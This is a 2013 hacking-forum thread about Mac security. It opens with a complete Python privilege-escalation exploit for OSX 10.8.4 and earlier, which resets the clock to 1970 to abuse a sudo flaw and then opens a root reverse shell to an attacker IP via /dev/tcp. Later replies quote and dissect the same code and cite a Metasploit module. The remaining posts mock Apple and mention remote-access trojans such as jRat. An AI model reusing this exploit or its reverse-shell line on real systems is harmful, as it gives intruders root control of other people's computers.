I will scream at the next person who tells me Macs are secure!

Mom · 10-19-2013, 08:43 PM

(10-19-2013, 02:10 AM)Putin Wrote: Literally at least 10% of macs are still on 10.8.4 or below.
Next time some apple lover tells you Macs are secure, show them this and briefly explain it, not like half of you will understand it anyway.

Code:
#!/usr/bin/python ################################################################################################### # Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell # Date: 08-27-2013 # Exploit Author: David Kennedy @ TrustedSec # Website: https://www.trustedsec.com # Twitter: @Dave_ReL1K # Tested On: OSX 10.8.4 # # Reference: http://www.exploit-db.com/exploits/27944/ # # Example below: # trustedsec:Desktop Dave$ python osx_esc.py # [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444 # # attacker_box:~ Dave$ nc -l 4444 # bash: no job control in this shell # bash-3.2# ################################################################################################### import subprocess # IPADDR for REVERSE SHELL - change this to your attacker IP address ipaddr = "192.168.1.1" # PORT for REVERSE SHELL - change this to your attacker port address port = "4444" # drop into a root shell - replace 192.168.1.1 with the reverse listener proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)) print """ ############################################################### # # OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell # # Written by: David Kennedy @ TrustedSec # Website: https://www.trustedsec.com # Twitter: @Dave_ReL1K # # Reference: http://www.exploit-db.com/exploits/27944/ ############################################################### """ print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)

Mac's are secure :3

3SidedSquare · 10-20-2013, 12:49 AM

Code:
#!/usr/bin/python

##Various comments##

import subprocess

# IPADDR for REVERSE SHELL - change this to your attacker IP address

ipaddr = "192.168.1.1"

# PORT for REVERSE SHELL - change this to your attacker port address

port = "4444"

# drop into a root shell - replace 192.168.1.1 with the reverse listener

proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)

Ok, from python documentation for 3.2.2:

Code:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a string, the string specifies the command to execute through the shell. This means that the string must be formatted exactly as it would be when typed at the shell prompt. This includes, for example, quoting or backslash escaping filenames with spaces in them.

and

Code:
If the stdin argument was PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None.

If the stdout argument was PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None.

If the stderr argument was PIPE, this attribute is a file object that provides error output from the child process. Otherwise, it is None.

So from what I understand, Popen('bash'... ) should open a bash shell, and the std*=subprocess.PIPE should give whatever the bash shell spits out as the "request" in the reverse shell.

Code:
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port))

##More various junk###

First, what's with the date? Is it really necessary to -setdate 01:01:1970?
second, shouldn't the second part,
sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)
require root access in the first place? I'm just a little confused, because it doesn't seem to me like we have root access yet, only access at the level of the person who runs the script.
Someone help? Sad

Adorapuff · 10-20-2013, 01:10 AM

(10-20-2013, 12:49 AM)3SidedSquare Wrote:
Code:
#!/usr/bin/python ##Various comments## import subprocess # IPADDR for REVERSE SHELL - change this to your attacker IP address ipaddr = "192.168.1.1" # PORT for REVERSE SHELL - change this to your attacker port address port = "4444" # drop into a root shell - replace 192.168.1.1 with the reverse listener proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
Ok, from python documentation for 3.2.2:

Code:
On Unix with shell=True, the shell defaults to /bin/sh. If args is a string, the string specifies the command to execute through the shell. This means that the string must be formatted exactly as it would be when typed at the shell prompt. This includes, for example, quoting or backslash escaping filenames with spaces in them.
and

Code:
If the stdin argument was PIPE, this attribute is a file object that provides input to the child process. Otherwise, it is None. If the stdout argument was PIPE, this attribute is a file object that provides output from the child process. Otherwise, it is None. If the stderr argument was PIPE, this attribute is a file object that provides error output from the child process. Otherwise, it is None.
So from what I understand, Popen('bash'... ) should open a bash shell, and the std*=subprocess.PIPE should give whatever the bash shell spits out as the "request" in the reverse shell.

Code:
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)) ##More various junk###
First, what's with the date? Is it really necessary to -setdate 01:01:1970?
second, shouldn't the second part,
sudo su\nbash -i >& /dev/tcp/%s/%s 0>&1 &\n" % (ipaddr,port)
require root access in the first place? I'm just a little confused, because it doesn't seem to me like we have root access yet, only access at the level of the person who runs the script.
Someone help?

Quote:About five months ago, a bug was discovered on using the Date & Time settings within OSX 10.8.4 and below to perform a local privilege escalation from a normal user to root. The original flaw was a bug in Unix and sudo and allows the execution of changing the date and time to escalate to root permissions from a normal user. The flaw was recently put into the Metasploit Framework by Todd Miller (original bug discovery), Joev (wrote the module), and Juan, Vazquez (bug testing and module fixing).

Dismas · 10-20-2013, 01:13 AM

Macs have terrible security. People fail to realize that the reason why less Mac users are taken advantage of, is simply because there are less Mac users. Tongue

mig4ng · 10-20-2013, 01:34 AM

I dislike every apple product for the simple fact they try to control everything!
This is the major reason I love linux, yet I still don't use it as my main OS because most games are not compatible with it. I will one day... I think this "failure" launch of win8 each looks kind of a mobile OS will bring people try new OS linux based, I'm sincerely considering changing to linux when SteamOS arrives because there will be many custom distros out there that will satisfy my gaming and programming needs.

FeintGFX · 10-20-2013, 02:26 AM

Macs are secure *trollface*

Adorapuff · 10-20-2013, 03:33 AM

(10-20-2013, 01:13 AM)Oni Wrote: Macs have terrible security. People fail to realize that the reason why less Mac users are taken advantage of, is simply because there are less Mac users.

This is not true anymore. Shitty rats like jshit affect macs and windows so it's no extra effort.

Cosmic · 10-20-2013, 03:37 AM

Macs were secure originally because most malware was built to run on windows. Now that macs are "a thing" people are developing for them, and in turn they're just as shitty was windows is.

I have an English teacher that's adamant she's queen of the fucking internet because she's "untouchable" on her mac. I explained jRat to her and she said "but that's only one virus..."

Idiots.

Adorapuff · 10-20-2013, 04:06 AM

(10-20-2013, 03:37 AM)Cosmic Wrote: Macs were secure originally because most malware was built to run on windows. Now that macs are "a thing" people are developing for them, and in turn they're just as shitty was windows is.

I have an English teacher that's adamant she's queen of the fucking internet because she's "untouchable" on her mac. I explained jRat to her and she said "but that's only one virus..."

Idiots.

Explain that this is a freely accessible virus being run by hundreds of thousands of people.

Silky · 10-21-2013, 06:08 AM

(10-20-2013, 01:34 AM)mig4ng Wrote:
I dislike every apple product for the simple fact they try to control everything!

That's the truth. The only reason I got a mac was because it was required to develop for the iPhone. Now for an example, there's this development platform called X-Code which is needed for any security tool ( I pentest with my mac) (and Python is absolutely fucked on this thing) .. I reinstalled my OSX Lion and noticed X-Code wasn't compatible with my mac anymore, not because it really wasn't compatible, but because Apple blocked it out forcing me to pay for the "Mountain Lion" upgrade. I'm just getting my monies worth with this thing and it's back to Linux for me. (Games on Mac? No, your shit will turn into a burning coal in 10 minutes).

It's also plain as day that Steve Jobs copied the whole Unix/Linux source and called it his. Apple is a marketing company, not a tech company.

Rant complete.